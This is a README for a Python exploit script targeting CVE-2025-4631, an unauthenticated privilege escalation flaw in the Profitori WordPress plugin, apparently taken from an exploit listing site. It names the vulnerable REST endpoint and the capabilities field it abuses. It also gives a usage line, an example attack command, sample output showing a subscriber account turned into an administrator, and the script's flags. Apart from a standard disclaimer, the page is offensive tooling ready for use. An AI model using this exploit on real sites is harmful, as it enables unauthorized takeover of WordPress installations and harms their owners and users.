Share 
## https://sploitus.com/exploit?id=EDDBE825-8084-5420-9BDA-4EFD4FDF5E1B
## 🚨 CVE-2025-4631 - Profitori WordPress Plugin Privilege Escalation Exploit

### πŸ“Œ Vulnerability Summary
**Profitori Plugin (versions 2.0.6.0 to 2.1.1.3)** is vulnerable to **unauthenticated privilege escalation** due to a missing capability check in the `/wp-json/stocktend/v1/stocktend_object` endpoint. This allows remote attackers to escalate the privileges of existing users (or create new ones) by directly manipulating the `wp_capabilities` meta field.

- **CVE**: CVE-2025-4631
- **CVSS Score**: 9.8 (Critical)
- **Published**: May 30, 2025
- **Last Updated**: May 31, 2025

---

## πŸ› οΈ What This Script Does
This Python exploit automates the privilege escalation process by:

1. βœ… Checking the plugin version via the `readme.txt` file.
2. πŸš€ Exploiting the vulnerable REST API endpoint if a vulnerable version is detected.
3. πŸ“‘ Sending the payload to escalate a user’s privileges to Administrator.
4. 🧾 Printing formatted, detailed results including the modified user’s credentials.

If the version check fails, the exploit proceeds cautiously with a warning.

---

## πŸ“Έ Exploit Proof
![Proof of Concept](./nxploit_poc.PNG)

---

## πŸ’» Usage
```bash
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
```

### Example:
```bash
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
```

### Sample Output:
```
[πŸ“„] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[βœ…] Vulnerable version detected: 2.1.1.3
[πŸš€] Exploiting in 3 seconds...
[πŸ“‘] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
πŸ†” User ID         : 3
πŸ‘€ Username        : subscriber
πŸ“§ Email           : subscriber@example.com
πŸͺͺ Display Name    : Subscriber User
πŸ”— User URL        : 
πŸ›‘ Role Raw        : a:1:{s:13:"administrator";b:1;}

[πŸ‘‘] Exploit By : Nxploited (Khaled_alenazi)
πŸ”— GitHub       : https://github.com/Nxploited
πŸ“§ Email        : NxploitBot@gmal.com
```

---

## βš™οΈ Script Arguments
| Flag               | Description                                      | Required |
|--------------------|--------------------------------------------------|----------|
| `-u`, `--url`       | 🌐 Base URL of the WordPress site               | βœ… Yes   |
| `-id`               | πŸ†” ID of the user to escalate                   | βœ… Yes   |
| `--email`           | πŸ“§ Fake email to display                        | ❌ No    |
| `--name`            | πŸ‘€ Display name                                 | ❌ No    |
| `--url_field`       | πŸ”— User URL field                               | ❌ No    |
| `--verbose`         | πŸ” Print full JSON response                     | ❌ No    |

---

## πŸ“‚ Requirements
- Python 3.x
- `requests` library

Install via:
```bash
pip install requests
```

---

## ⚠️ Disclaimer
This tool is provided for **educational and authorized testing purposes only**. Any misuse of this exploit against systems you do not own or have explicit permission to test is **strictly prohibited**. The creator is not responsible for any damages or legal consequences arising from improper usage.

---

*BY: Nxploited ( Khaled_Alenazi )*